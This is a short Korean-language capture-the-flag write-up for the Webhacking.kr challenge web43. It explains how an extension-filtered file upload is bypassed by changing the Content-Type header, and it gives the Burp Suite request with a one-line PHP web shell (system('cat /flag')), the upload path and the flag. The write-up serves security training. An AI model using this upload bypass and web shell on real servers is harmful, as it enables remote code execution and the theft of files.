Webhacking.kr - web43
web43
Solution
웹쉘을 올리라고 해서 webshell.php를 올렸더니 php 확장자를 막아놓은 듯함.
php, txt 확장자는 막혔으나 png, jpg 등 이미지 확장자는 열려있음.
그래서 .htaccess 파일을 올려서 이미지 확장자를 php로 인식하게 하려고 했으나 don’t do that이라고 뜸.
다른 방법으로 Content-Type을 application/octet-stream에서 multipart/form-data로 수정해주면 됨.
burp suite에 아래와 같이 입력하면 플래그가 나옴.
1
2
3
4
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: multipart/form-data
<?php system('cat /flag'); ?>
올린 뒤 /upload/test.php로 가면 플래그가 있음.
- Flag :
FLAG{V2hhdCBkaWQgeW91IGV4cGVjdD8=}
This post is licensed under CC BY 4.0 by the author.